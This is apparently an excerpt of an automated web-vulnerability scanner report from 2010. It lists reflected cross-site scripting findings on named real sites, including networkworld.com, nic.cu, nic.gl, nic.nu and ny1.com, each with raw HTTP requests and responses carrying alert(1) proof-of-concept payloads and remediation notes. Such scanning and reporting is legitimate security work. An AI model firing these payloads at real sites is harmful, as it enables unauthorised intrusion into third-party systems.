Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/043009-facebook-phishing.html8a692'-alert(1)-'46e03c44d9c HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Dec 2010 02:08:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 11 Dec 2010 02:08:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292033313708497; path=/; expires=Mon, 10-Dec-12 02:08:33 GMT
Content-Length: 74842
1.137. http://www.networkworld.com/news/2009/043009-facebook-phishing.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.networkworld.com
Path: /news/2009/043009-facebook-phishing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a9a'-alert(1)-'b19cfbda894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/043009-facebook-phishing.html?56a9a'-alert(1)-'b19cfbda894=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Sat, 11 Dec 2010 02:08:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123268
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f564d'-alert(1)-'34289712277 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsf564d'-alert(1)-'34289712277/2009/122409-e-book-piracy-the-publishing-industrys.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=287
Date: Sat, 11 Dec 2010 02:08:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74905
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1123d'-alert(1)-'2f7255d0f28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/20091123d'-alert(1)-'2f7255d0f28/122409-e-book-piracy-the-publishing-industrys.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=289
Date: Sat, 11 Dec 2010 02:08:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74905
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 780d6'-alert(1)-'060895cf3ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/122409-e-book-piracy-the-publishing-industrys.html780d6'-alert(1)-'060895cf3ba HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Dec 2010 02:08:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 11 Dec 2010 02:08:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292033315119216; path=/; expires=Mon, 10-Dec-12 02:08:35 GMT
Content-Length: 74905
1.141. http://www.networkworld.com/news/2009/122409-e-book-piracy-the-publishing-industrys.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb182'-alert(1)-'3f9f71bea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009/122409-e-book-piracy-the-publishing-industrys.html?bb182'-alert(1)-'3f9f71bea8d=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=281
Date: Sat, 11 Dec 2010 02:08:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129979
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efd1d'-alert(1)-'31fddc3e4a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcastsefd1d'-alert(1)-'31fddc3e4a3/panorama/2007/05/how_can_brandjacking_threaten.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Sat, 11 Dec 2010 02:08:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76497
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63889'-alert(1)-'aebabff57c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama63889'-alert(1)-'aebabff57c6/2007/05/how_can_brandjacking_threaten.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=283
Date: Sat, 11 Dec 2010 02:08:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74905
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6d05'-alert(1)-'0402adac998 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007c6d05'-alert(1)-'0402adac998/05/how_can_brandjacking_threaten.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=282
Date: Sat, 11 Dec 2010 02:08:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74905
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bcd2'-alert(1)-'0ece9fb4f82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/051bcd2'-alert(1)-'0ece9fb4f82/how_can_brandjacking_threaten.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=277
Date: Sat, 11 Dec 2010 02:08:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76497
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378d7'-alert(1)-'02988ed1b9c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/05/how_can_brandjacking_threaten.html378d7'-alert(1)-'02988ed1b9c HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=UTF-8 Expires: Sat, 11 Dec 2010 02:08:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 11 Dec 2010 02:08:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292033317387206; path=/; expires=Mon, 10-Dec-12 02:08:37 GMT Content-Length: 74905
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63a7'-alert(1)-'631ee0efcb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcastsf63a7'-alert(1)-'631ee0efcb6/panorama/2007/053007pan-markmonitor.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=281
Date: Sat, 11 Dec 2010 02:08:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76464
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec0c5'-alert(1)-'08a5b738ebb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panoramaec0c5'-alert(1)-'08a5b738ebb/2007/053007pan-markmonitor.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Sat, 11 Dec 2010 02:08:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76464
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3fe4'-alert(1)-'54aac2049a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007d3fe4'-alert(1)-'54aac2049a1/053007pan-markmonitor.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Sat, 11 Dec 2010 02:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74872
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef8f7'-alert(1)-'c279a5bf410 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/053007pan-markmonitor.htmlef8f7'-alert(1)-'c279a5bf410 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Dec 2010 02:08:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 11 Dec 2010 02:08:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292033322602363; path=/; expires=Mon, 10-Dec-12 02:08:42 GMT
Content-Length: 76464
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 703b1'-alert(1)-'85dfc8023e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/053007pan-markmonitor.html?703b1'-alert(1)-'85dfc8023e4=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=289
Date: Sat, 11 Dec 2010 02:08:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108552
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a9e3'-alert(1)-'38cdb6b0534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts5a9e3'-alert(1)-'38cdb6b0534/panorama/2007/073007pan-phishing.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=284
Date: Sat, 11 Dec 2010 02:08:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74863
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57e99'-alert(1)-'ac3fbd54407 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama57e99'-alert(1)-'ac3fbd54407/2007/073007pan-phishing.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=293
Date: Sat, 11 Dec 2010 02:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76455
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e750f'-alert(1)-'7f5ad6b06d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007e750f'-alert(1)-'7f5ad6b06d0/073007pan-phishing.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=276
Date: Sat, 11 Dec 2010 02:08:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74863
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25eda'-alert(1)-'2f98bf3e8f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/073007pan-phishing.html25eda'-alert(1)-'2f98bf3e8f HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Dec 2010 02:08:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 11 Dec 2010 02:08:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292033320828619; path=/; expires=Mon, 10-Dec-12 02:08:40 GMT
Content-Length: 76452
1.156. http://www.networkworld.com/podcasts/panorama/2007/073007pan-phishing.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.networkworld.com
Path: /podcasts/panorama/2007/073007pan-phishing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74268'-alert(1)-'44759732f4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts/panorama/2007/073007pan-phishing.html?74268'-alert(1)-'44759732f4b=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=279
Date: Sat, 11 Dec 2010 02:08:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106851
The value of the opt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a00'%3balert(1)//6ba92ff6dfa was submitted in the opt parameter. This input was echoed as e2a00';alert(1)//6ba92ff6dfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /docum_det.php?doc_id=1&opt=1e2a00'%3balert(1)//6ba92ff6dfa HTTP/1.1
Host: www.nic.cu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:09:42 GMT
Server: Netscape-Enterprise/6.0
X-Powered-By: PHP/5.3.0
Connection: close
Content-Type: text/html
Content-Length: 70334
The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9407a"><script>alert(1)</script>5a944a8e5f was submitted in the opt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /docum_det.php?doc_id=1&opt=19407a"><script>alert(1)</script>5a944a8e5f HTTP/1.1
Host: www.nic.cu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:09:40 GMT
Server: Netscape-Enterprise/6.0
X-Powered-By: PHP/5.3.0
Connection: close
Content-Type: text/html
Content-Length: 70362
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2504c"><img%20src%3da%20onerror%3dalert(1)>6a1c544711c was submitted in the REST URL parameter 3. This input was echoed as 2504c"><img src=a onerror=alert(1)>6a1c544711c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bin/view/Legal2504c"><img%20src%3da%20onerror%3dalert(1)>6a1c544711c/ HTTP/1.1
Host: www.nic.gl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 11 Dec 2010 02:06:28 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Set-Cookie: JSESSIONID=D80CB563167F58B7F40439977702A9A0; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en
Content-Length: 8854
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <meta name="restURL" content="/rest/wikis/nicgl/spaces/Legal2504c"><img src=a onerror=alert(1)>6a1c544711c/pages/WebHome"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a77cf<img%20src%3da%20onerror%3dalert(1)>89b5dcafbe9 was submitted in the REST URL parameter 3. This input was echoed as a77cf<img src=a onerror=alert(1)>89b5dcafbe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bin/view/Legala77cf<img%20src%3da%20onerror%3dalert(1)>89b5dcafbe9/ HTTP/1.1
Host: www.nic.gl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 11 Dec 2010 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Set-Cookie: JSESSIONID=39D875D5EB41638FF3C0EAC0E8D5D511; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en
Content-Length: 8785
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <strong>Legala77cf<img src=a onerror=alert(1)>89b5dcafbe9</strong> ...[SNIP]...
1.161. http://www.nic.nu/about/terms.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.nic.nu
Path: /about/terms.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between XMP tags. The payload afe53</xmp><script>alert(1)</script>68e8a42f98c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within XMP tags does not prevent XSS attacks if the user is able to close the XMP tag.
Request
GET /about/terms.cfm?afe53</xmp><script>alert(1)</script>68e8a42f98c=1 HTTP/1.1
Host: www.nic.nu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 11 Dec 2010 02:07:01 GMT
Connection: close
Content-type: text/html
Page-Completion-Status: Abnormal
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e01'%3b985fa83aacf was submitted in the REST URL parameter 1. This input was echoed as f6e01';985fa83aacf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1f6e01'%3b985fa83aacf/OnTheAir/ny1_for_you.jsp HTTP/1.1
Host: www.ny1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Sat, 11 Dec 2010 02:08:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 55260
Vary: Accept-Encoding
Cache-Control: public, max-age=551
Expires: Sat, 11 Dec 2010 02:17:19 GMT
Date: Sat, 11 Dec 2010 02:08:08 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/ny1f6e01';985fa83aacf/OnTheAir/ny1_for_you.jsp'; var gRegionSelected = '1';//]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 336e6'%3ba3c60f719c7 was submitted in the REST URL parameter 2. This input was echoed as 336e6';a3c60f719c7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir336e6'%3ba3c60f719c7/ny1_for_you.jsp HTTP/1.1
Host: www.ny1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Sat, 11 Dec 2010 02:08:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 55257
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Sat, 11 Dec 2010 02:18:21 GMT
